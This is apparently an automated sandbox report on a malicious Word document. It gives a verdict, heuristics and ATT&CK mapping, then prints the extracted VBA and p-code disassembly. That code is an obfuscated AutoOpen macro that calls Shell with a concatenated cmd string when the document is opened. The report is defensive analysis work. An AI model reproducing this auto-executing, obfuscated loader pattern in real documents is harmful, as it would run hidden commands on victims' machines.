Verdict: MALICIOUS
Risk Score: 120

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The sample contains a legacy WordBasic auto-exec macro named AutoOpen, which Word runs automatically when the document is opened. Under On Error Resume Next, the macro calls Shell with a command string built by concatenating KeyString(vbKeyC) with the values of thirteen further obfuscated identifiers (at least one of them, qkocjRXozk, is a function defined in a second module stream). This indicates the document is likely a loader for a secondary payload.
Heuristics (4)

- VBA macros detected (medium; OLE_VBA_MACROS; 2 related findings): Document contains VBA macro code.
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44106 bytes | bf7d2e986adedcc224300147c92b1f2f6c83cd62c26d2bf06da84f140e45383d |
Preview script (first 1,000 lines of the extracted script; decoded VBA source followed by the p-code disassembly emitted as comments)

```vba
Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Sgn(211519271)
TypeName 95
TypeName dwcBFA
TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
TypeName Oct(7415 + wBbjOc)
TypeName Hex(820)
End Sub
' Processing file: /opt/analyzer/scan_staging/1b93d6b2ca844ef0baeaa08332267f4e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/VXzoOtZVpkqYRd - 1982 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitDI4 0x8727 0x0C9B
' FnSgn
' ArgsCall TypeName 0x0001
' Line #3:
' LitDI2 0x005F
' ArgsCall TypeName 0x0001
' Line #4:
' Ld dwcBFA
' ArgsCall TypeName 0x0001
' Line #5:
' Ld PRhtji
' Ld pzwJz
' LitDI4 0x55A4 0x0001
' Mul
' Sub
' Ld zFlLNk
' Sub
' ArgsLd Atn 0x0001
' ArgsCall TypeName 0x0001
' Line #6:
' Ld PrhbH
' ArgsCall TypeName 0x0001
' Line #7:
' Ld vbKeyC
' ArgsLd KeyString 0x0001
' Ld JQjiYpwTYJh
' Add
' Ld wADEWZn
' Add
' Ld qkocjRXozk
' Add
' Ld SrLJcKU
' Add
' Ld jqfOKroKkj
' Add
' Ld UVMStnSwnuS
' Add
' Ld cXoQHhaw
' Add
' Ld XfuLUTYcN
' Add
' Ld qjOpKzfk
' Add
' Ld khOUbITmDB
' Add
' Ld SwAEVG
' Add
' Ld hNfIrziVNvNEYQ
' Add
' Ld SRmwQuwFmolR
' Add
' LitDI4 0x16D9 0x2C98
' LitDI4 0x16D9 0x2C98
' Sub
' ArgsCall Shell@ 0x0002
' Line #8:
' LitDI2 0x1CF7
' Ld wBbjOc
' Add
' ArgsLd Oct 0x0001
' ArgsCall TypeName 0x0001
' Line #9:
' LitDI2 0x0334
' ArgsLd Hex 0x0001
' ArgsCall TypeName 0x0001
' Line #10:
' EndSub
' Line #11:
' Macros/VBA/HqzoUYE - 22104 bytes
' Line #0:
' FuncDefn (Function qkocjRXozk())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitDI2 0x0008
' ArgsCall TypeName 0x0001
' Line #3:
' LitDI2 0x0005
' ArgsCall TypeName 0x0001
' Line #4:
' Ld € ÿ kZjddf¬| € ÿ KwzmUac € ÿ XbOsu.E
' € ÿ RtUVbJWOdTÑ € ÿ hanNcÓZ € ÿ pFfiCcÉ‹ € ÿ wdowEUà( € ÿ patquL ¯ € ÿ WutWJiè € ÿ jMmupzت € ÿ JaI
' Ld òÅ € ÿ wmhREY%Í Tan-Ø € ÿ NwCriYî\ € ÿ VAzENw#˜ € ÿ vtzTBPB € ÿ bOFKjU { € ÿ RSdw
' Div
' Ld Id
' Ld PUS‚Ð ChrBŽš € ÿ vpIMw Ð € ÿ nCbMbosºÃ € ÿ kdcvQJ
' Mul
' Add
' Coerce (Bool)
' ArgsCall TypeName 0x0001
' Line #5:
' LitStr 0x0002 "md"
' LitStr 0x0002 " /"
' Add
' LitStr 0x0001 "V"
' Add
' LitStr 0x0001 ":"
' Add
' LitStr 0x0002 "ON"
' Add
' LitStr 0x0001 "/"
' Add
' LitStr 0x0001 "C"
' Add
' Ld DHwjkFiKnnA
' Ld arsJrZ
' Add
' LitDI2 0x0022
' Add
' Ld UUEhpW
' Add
' Ld nPHdqT
' Add
' ArgsLd dbwkHm 0x0001
' Coerce (Str)
' Add
' LitStr 0x0001 "s"
' Add
' St ZzMiiL
' Line #6:
' LitDI2 0x03B8
' ArgsCall TypeName 0x0001
' Line #7:
' LitDI4 0xD4E5 0x0A95
' ArgsCall TypeName 0x0001
' Line #8:
' LitStr 0x0001 "e"
' LitStr 0x0003 "t #"
' Add
' LitStr 0x0001 " "
' Add
' LitStr 0x0003 " ="
' Add
' LitStr 0x0003 " "
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Line #9:
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Line #10:
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Line #11:
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
' Imp
```

... (truncated)